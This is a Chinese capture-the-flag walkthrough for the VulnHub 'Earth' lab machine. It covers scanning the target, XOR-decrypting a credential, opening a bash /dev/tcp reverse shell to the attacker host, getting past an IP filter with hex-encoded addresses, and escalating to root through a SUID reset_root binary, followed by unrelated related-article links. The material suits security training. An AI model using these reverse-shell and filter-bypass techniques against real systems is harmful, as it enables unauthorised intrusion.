2-vulnhub靶场,Earth

news/2025/3/13 19:59:04/

Vulnhub earth靶机
攻击机192.168.137.129
靶机192.168.137.128
在这里插入图片描述
开放22,80,443端口
发现443端口显示这个ip绑定了俩个域名
查看80端口
在这里插入图片描述
查看443端口
在这里插入图片描述
修改host文件
linux目录:/etc/hosts
后面添加192.168.137.128 earth.local terratest.earth.local
访问https://earth.local
https://terratest.earth.local (无)
http://earth.local
http://terratest.earth.local
页面都是下面这个
在这里插入图片描述
利用kal对该域名进行目录扫描
dirb https://earth.local
在这里插入图片描述
第一个地址显示有内容,第二个地址返回403
在这里插入图片描述
扫描第二个域名的目录:
在这里插入图片描述
查看robots.txt文件
在这里插入图片描述
最后面有个文件名,尝试后缀为txt:
在这里插入图片描述
在这里插入图片描述
这里可以知道域名上那些加密字段是通过密钥‘testdata.txt’xor运算得到的.
发现账户名terra.
先把这个txt文件下载下来:

wget https://terratest.earth.local/testdata.txt --no-check-certificate

在这里插入图片描述
写个小程序

import binascii
testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
data = input()
print(hex(int(data,16) ^ int(testdata,16)))

运行然后将要解密的数据输入即可,解密数据如下:

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

3段密文,貌似就之后最后一个解密的数据是有用的,其余都是乱码
看看第3段密文解析;
在这里插入图片描述
可以发现是earthclimatechangebad4humans的循环
尝试账号terra,密码earthclimatechangebad4humans进行登录:
显示登录成功:
在这里插入图片描述
发现是一个命令执行权限
在这里插入图片描述
尝试反弹shell

Kali攻击机执行
nc -lvp 23333
命令执行
bash -i >& /dev/tcp/192.168.137.129/23333 0>&1

在这里插入图片描述
显示拒绝连接
任意方法在文件中查看一下,最终在secure_message/forms.py中发现:(可以下载整套源码放入到代码审计系统中搜寻‘Remote connections are forbidden’)

for potential_ip in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', value): try: ip_address(potential_ip) except: pass 
else: raise ValidationError('Remote connections are forbidden.')

这个代码就是对ip的字母进行了过滤,所以可以将ip数字转换为16进制进行绕过:
指令如下:

bash -i >& /dev/tcp/0xc0.0xa8.0x89.0x81/23333 0>&1

成功:
在这里插入图片描述
提权:

find / -perm -u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行) 
S 为SUID/SGID特殊权限
-type 文件类型f->文件  d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

在这里插入图片描述
在这里插入图片描述
显示没有相应的触发器,
只好将其传到kali
攻击机:nc -nlvp 1234 >reset_root
靶机shell:nc 192.168.137.129 1234 < /usr/bin/reset_root
在这里插入图片描述
给予用户权限
在这里插入图片描述
下面利用strace进行解析

strace /home/kali/reset_root

在这里插入图片描述
可以看到,程序执行到这个三个目录就停止了
在shell查看一下有没有这个目录
发现没有,就将这三都创建看看
在这里插入图片描述
或者命令:

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

shell中执行reset_root文件
显示将密码重置为Earth
在这里插入图片描述
Su切换账号,密码是Earth
在这里插入图片描述
提权成功


http://www.ppmy.cn/news/853997.html

相关文章

VMware虚拟机安装及静态IP设置配置国内镜像

VMware虚拟机安装及静态IP设置配置国内镜像

实验目的 准备虚拟机&#xff0c;安装Centos7,配置静态IP&#xff0c;配置国内镜像 软件统计 工具名称说明VMware-workstation-full-15.5.1-15018445.exe虚拟机安装包MobaXterm_Portable_v20.3.zip解压使用&#xff0c;远程连接Centos系统远程访问使用&#xff0c;支持登录和…
阅读更多...
Vulnhub-Earth

Vulnhub-Earth

一、靶机IP探测 arp-scan -l 172.20.10.1是路由器IP&#xff0c;172.20.10.12是宿主机的IP&#xff0c;确定靶机IP为172.20.10.5. 二、端口扫描 nmap -T4 -sV -p- -A 172.20.10.5 22端口是ssh端口&#xff0c;可以尝试爆破。 80和443两个端口是http端口&#xff0c;看到SAN&a…
阅读更多...
docker安装与简单使用

docker安装与简单使用

文章目录 docker安装1.卸载原来安装过的docker&#xff0c;如果没有安装可以不需要卸载2.安装yum相关的工具&#xff0c;下载docker-ce.repo文件3.安装docker-ce软件4.启动docker服务 docker使用nginxdocker使用mysql解决启动失败的问题 docker安装 centos下安装docker 这里参…
阅读更多...
《大大简化每次运行bochs的命令行》ubuntu里安装vscode + makefile文件基本编写 + shell命令

《大大简化每次运行bochs的命令行》ubuntu里安装vscode + makefile文件基本编写 + shell命令

&#x1f4cd;安装vscode 启动vscode 如图打开商店&#xff0c;在搜索栏里输入visual studio code&#xff0c;安装即可 在随便一个命令行里输入code即可打开vscode &#x1f4cd;makefile文件基本编写 在实验项目文件夹里创建makefile文件&#xff08;vscode直接能快捷创…
阅读更多...
YOLO下载库的问题

YOLO下载库的问题

问题描述&#xff1a;下载gdown库时&#xff0c;出现403错误&#xff0c;具体如下 ERROR: HTTP error 403 while getting https://pypi.tuna.tsinghua.edu.cn/packages/e7/0c/9fb84c67bd827902bfadcdd209796ef32f95df8b23c39a6 06a5ee517b314/gdown-4.5.3.tar.gz#sha2566cbf7dd…
阅读更多...
spark找不到服务器文件,在Standalone模式下执行Spark命令所产生的临时目录导致硬盘爆满的解决方法...

spark找不到服务器文件,在Standalone模式下执行Spark命令所产生的临时目录导致硬盘爆满的解决方法...

昨天,在执行spark-sql时,查询数据量超过1000万行,数据量大小7.6G,出现系统盘占用突然变高的情况,Job任务在运行过程中产生大量的临时目录位置,导致某个分区磁盘写满,主要原因spark运行产生临时目录的默认路径/tmp/spark检查为 /tmp 目录下,spark生成的临时目录占用了大…
阅读更多...
动态路由 TheRouter 的设计与实践

动态路由 TheRouter 的设计与实践

这篇文章是我在 2022【GIAC 全球互联网架构大会】分享时所讲内容的文字版本&#xff0c;修改删减了演讲时的冗余言语&#xff0c;现开放给大家阅读&#xff0c;希望能给买不到票参加分享的 开源实验室 读者带来帮助。 大家好&#xff0c;今天跟大家分享的是一个开源路由TheRou…
阅读更多...
IDEA懒人必备插件,自动生成单元测试,太爽了!

IDEA懒人必备插件,自动生成单元测试,太爽了!

一安 一安未来 2023-03-01 08:00 发表于北京 收录于合集#第三方工具30个 大家好&#xff0c;我是一安&#xff5e; 今天来介绍一款工具Squaretest&#xff0c;它是一款自动生成单元测试的插件&#xff0c;为什么会用到它&#xff1f; 主要因为最近公司上了代码质量管控的指…
阅读更多...
最新文章

Copyright @ 2022~2023